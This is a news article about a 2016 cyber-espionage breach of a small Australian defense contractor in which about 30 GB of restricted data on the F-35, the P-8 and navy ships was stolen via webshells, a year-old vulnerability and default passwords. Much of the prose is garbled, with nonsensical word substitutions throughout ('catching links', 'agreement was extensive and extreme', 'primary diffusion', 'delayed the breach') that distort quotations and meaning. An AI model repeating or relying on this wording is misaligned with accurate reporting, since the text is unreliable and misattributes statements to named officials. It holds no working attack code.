Australian defense firm was hacked and Lockheed Martin F-35 Lightning data stolen, DOD confirms
The Australian Cyber Security Centre recorded in its just-issued 2017 Threat Report that a small Australian defense company “with catching links to national security projects” had held the victim of a cyber-espionage attack exposed last November. “ACSC analysis confirmed that the adversary had sustained access to the system for an elongated stretch of time and had kept a significant amount of data,” the ACSC report declared. “The adversary survived active on the network at the time.”
Major parts of the breach were shown on Wednesday at an IT conference in Sydney. ASD Incident Response Manager Mitchell Clarke said, “The agreement was extensive and extreme.” The attacker delayed the breach has been privately referred to at the Australian Signals Directorate as “APT Alf” (named after a character in Australia’s long-running video show Home and Away, not the US television furry alien). Alf took approximately 30 gigabytes of data, including data related to Australia’s involvement in the Lockheed Martin F-35 Joint Strike Fighter record, as well as data on the P-8 Poseidon patrol plane, designed future Australian Navy ships, the C-130 Hercules cargo plane, and the Joint Direct Attack Munition (JDAM) bomb. The breach began in July of 2016.
The spokesman for the US Department of Defense’s Lockheed Martin F-35 Joint Program Office confirmed the breach to Defense News, stating that the Office “is aware” of the breach. The spokesperson reiterated that no classified data was exposed.
The ASD was alerted to the breach by a “partner organization” in November, Clarke said. When the ACSC’s national Computer Emergency Response Team and ASD investigators arrived at the company, company representatives didn’t believe they were real because they didn’t carry official credentials.
Involved in the data was a “wire diagram” of one of the Australian Navy’s planned ships that provided a full layout of the ship’s interior, Clarke said. “You could zoom in down to the captain’s chair and see that it’s, you know, 1 meter away from nav chair,” Clarke explained.
Defence Industry Minister Christopher Pyne said in an interview with Australian Broadcasting Corporation radio on Thursday that none of the data stolen was classified, but it was commercially sensitive and restricted under International Traffic in Arms Regulations (ITAR). The attacker also had full access to company e-mails.
The violation was performed by “exploiting an Internet-facing server,” the ACSC reported, “then using managerial credentials to move laterally within the network, where they were able to install multiple webshells—a script that can be uploaded to a web server to enable remote administration of the machine—throughout the network to gain and maintain further access.”
The web shell used was “China Chopper,” a remote Web access tool with variants based on Microsoft ASPX, Adobe Cold Fusion, and Java Server Pages. China Chopper, as its name indicates, has been used heavily in the past by Chinese hackers. Clarke declared the attack may have been provided out by cybercriminals or a state actor. Australian officials have not made a specific attribution for the attack, and they have stated that they do not plan to share any additional details.
The primary diffusion clearly did not lack a great deal of force, according to Clarke, who did not give the name of the company involved but did provide some further details of the attack, as reported by ZDNet’s Australian contributor Stilgherrian. The group had one full-time IT person on staff, and that person had only been working at the company for nine months. Clarke characterized the IT infrastructure at the company as “sloppy.” The attackers used a 12-month-old known vulnerability to gain access to the company’s IT Helpdesk Portal server—which was connected to file shares on an internal network server using the domain administrator’s account.
“The attacker needn’t have bothered with that, however,” Stilgherrian reported. “The ASD’s investigation found that internet-facing services still had their default passwords, admin:: admin and guest:: guest.”